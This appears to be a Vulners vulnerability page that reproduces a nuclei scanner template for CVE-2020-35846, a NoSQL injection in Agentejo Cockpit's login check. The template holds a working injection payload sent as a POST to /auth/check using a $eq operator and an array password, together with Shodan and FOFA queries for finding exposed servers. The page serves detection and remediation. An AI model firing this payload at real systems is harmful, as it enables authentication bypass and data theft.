Lucene search
+L

Agentejo Cockpit < 0.11.2 - NoSQL Injection

🗓️ 27 Jul 2026 04:16:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 72 Views

Agentejo Cockpit < 0.11.2 - NoSQL Injection allows unauthorized access, data leakage, and manipulation. Upgrade to version 0.11.2 or later to mitigate the ris

Related
Refs
Code
ReporterTitlePublishedViews
Family
zdt
zdt
Cockpit CMS 0.11.1 NoSQL Injection / Remote Command Execution Exploit
21 Apr 202100:00
zdt
zdt
zdt
Cockpit CMS 0.11.1 - (Username Enumeration & Password Reset) NoSQL Injection Exploit
10 Aug 202100:00
zdt
githubexploit
GithubExploit
Exploit for SQL Injection in Agentejo Cockpit
25 Jul 202105:05
githubexploit
githubexploit
GithubExploit
Exploit for SQL Injection in Agentejo Cockpit
6 Aug 202109:19
githubexploit
githubexploit
GithubExploit
Exploit for SQL Injection in Agentejo Cockpit
5 Aug 202118:48
githubexploit
githubexploit
GithubExploit
Exploit for SQL Injection in Agentejo Cockpit
21 Jan 202622:18
githubexploit
attackerkb
ATTACKERKB
CVE-2020-35846
30 Dec 202000:00
attackerkb
attackerkb
ATTACKERKB
CVE-2020-35847
30 Dec 202000:00
attackerkb
circl
Circl
CVE-2020-35846
30 Dec 202007:30
circl
cnnvd
CNNVD
Agentejo Cockpit SQL注入漏洞
29 Dec 202000:00
cnnvd
Rows per page
id: CVE-2020-35846

info:
  name: Agentejo Cockpit < 0.11.2 - NoSQL Injection
  author: dwisiswant0
  severity: critical
  description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate the vulnerability.
  reference:
    - https://swarm.ptsecurity.com/rce-cockpit-cms/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35846
    - https://getcockpit.com/
    - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466
    - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-35846
    cwe-id: CWE-89
    epss-score: 0.93201
    epss-percentile: 0.99824
    cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: agentejo
    product: cockpit
    shodan-query:
      - http.favicon.hash:688609340
      - http.html:"cockpit"
    fofa-query:
      - icon_hash=688609340
      - body="cockpit"
  tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/auth/check"

    body: |
      {
        "auth": {
          "user": {
            "$eq": "admin"
          },
          "password": [
            0
          ]
        }
      }

    headers:
      Content-Type: application/json

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "password_verify() expects parameter"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210097fa19b9194df2edbd35a377b72614b6012f89b567c5534a06e4d46e0c0697ea02200aec9a916ce14482a10bc35b59a234b36cdaf9a0dd1686f6823c1eba60b389f1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
CVSS 3.19.8
EPSS0.93201
72